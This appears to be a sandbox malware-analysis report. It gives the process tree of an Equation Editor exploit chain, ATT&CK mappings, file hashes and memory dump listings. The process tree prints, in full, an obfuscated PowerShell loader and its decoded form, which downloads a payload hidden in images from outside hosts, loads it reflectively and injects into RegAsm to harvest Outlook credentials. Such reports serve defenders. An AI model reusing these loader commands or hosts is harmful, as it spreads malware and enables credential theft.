"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imgeloversaround.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreEYDgTreVDgTreBSDgTreEsDgTreLwBoDgTreGcDgTreZgDgTrevDgTreHDgTreDgTrecDgTreBtDgTreGEDgTreeDgTreDgTrevDgTreDYDgTreNQDgTreuDgTreDcDgTreODgTreDgTreuDgTreDcDgTreMwDgTreyDgTreC4DgTreMwDgTrewDgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEsDgTreUgBUDgTreEYDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FTRK/hgf/ppmax/65.78.732.301//:ptth' , '1' , 'C:\ProgramData\' , 'KRTF','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\KRTF.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kccabm"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:932

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nwhtceohw"
6⤵
- Accesses Microsoft Outlook accounts
PID:3028

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqmlcxzbsswmq"
6⤵
PID:472

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqmlcxzbsswmq"
6⤵
PID:780

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqmlcxzbsswmq"
6⤵
PID:1916

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqmlcxzbsswmq"
6⤵
PID:556

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqmlcxzbsswmq"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
0567d49f2eb13c05fbce0d95bf2d6ad2

SHA1
8f919d601199f6667914efab57a5ee0687862720

SHA256
dc92ca985b924971e9df7e3b0fd83bc202b7909feb44fe924e3ed778847bcfe2

SHA512
468ae1cb0b947131ea27e85de511ecc78f367b98f979d0b4b4e17ed39f9e1954e42b4399fc035b98f10160b7a9a525fc5fe11e22acf0dcf10bf26fd6c960bfe3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
08fc57f1049d8369868e2432d2773850

SHA1
90396d05118384ec469f8ede82ea4c47c0ad0866

SHA256
c91de1a137dd1b3ac5b13cc60725cc47515d1295725bb40bb8f6bf5cca3deefb

SHA512
41a811e9663969aed62662d192f18bbf38bd9e6f6a431e511902e6d5f2e64d445e7cfdb5e7f05331626d6baa892c84c7753890d8abbe64efa34a90ea0f2ffbf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2C5E.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2C61.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2D60.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\kccabm

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
bb5449e3ee43fe2d44f42a013a2151d2

SHA1
f61c1346d216affd53c1ce235082ca15870dbe75

SHA256
e4af0b3b9821b20ff2ea02b1659a134f10cb20b0d2c0c608486d2c3d2bc1f5cf

SHA512
a6614eb400bf81db9702ea63d345d32f8a642584fc0b5412672afd052a4a8b7a00cab02450d7a224bef92062f49a02f06a6695d3da851588b0596f326fdc8e46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
fcc4ee8c83cda016ab9daa3d6e36fdd4

SHA1
6e125913ab266045cd94f4a50b0ce6dae784d7ac

SHA256
510a252634dd513709eafb59374a1cad34e58b0eec9165212c999f2d17f02b47

SHA512
10c0bced06711b57ec993f78b4a0db5df066a14b6a5f50ec3300d7ba648448e8a7a9ff79ab5da90ac121ae5514ad93b8e8b42c95aa766ebcfc988c25a17c957b

Download Submit
C:\Users\Admin\AppData\Roaming\imgeloversaround.vbs

Filesize
5KB

MD5
2a520c8caa07eaed10422ff67f239626

SHA1
18cfb75b5f659e695336cec6c3cdf0bacc427e5d

SHA256
46f873513f403b202a8a3e6b565c60bc536b3ea80e77def007f1ccb19c52c4ad

SHA512
ba137a4e43c67adebf69b81fadcd0751268c45f21cb1f452f1d057c2f11c58c07987da2ea721f34e1fdd88e815125eab7af34973c3af719dbe38dae07bd57b81

Download Submit
memory/772-129-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/772-124-0x000000006AC60000-0x000000006B20B000-memory.dmp

Filesize
5.7MB

Download
memory/772-130-0x000000006AC60000-0x000000006B20B000-memory.dmp

Filesize
5.7MB

Download
memory/772-128-0x000000006AC60000-0x000000006B20B000-memory.dmp

Filesize
5.7MB

Download
memory/772-125-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/932-168-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/932-190-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/932-164-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/932-175-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/932-176-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/932-171-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1500-198-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1500-181-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1500-194-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1500-195-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1500-196-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1500-178-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1500-197-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1500-192-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1544-46-0x000000006AC60000-0x000000006B20B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-148-0x000000006AC60000-0x000000006B20B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-45-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/1544-44-0x000000006AC60000-0x000000006B20B000-memory.dmp

Filesize
5.7MB

Download
memory/1544-47-0x00000000029D0000-0x0000000002A10000-memory.dmp

Filesize
256KB

Download
memory/1544-49-0x00000000055E0000-0x00000000055F2000-memory.dmp

Filesize
72KB

Download
memory/1544-48-0x0000000004E40000-0x0000000004E4D000-memory.dmp

Filesize
52KB

Download
memory/2236-147-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-161-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-145-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-142-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-210-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2236-150-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-209-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-151-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-153-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-154-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-155-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-156-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-157-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-159-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-160-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-143-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2236-141-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-208-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-140-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-139-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-138-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-207-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-206-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-204-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2236-137-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2236-203-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
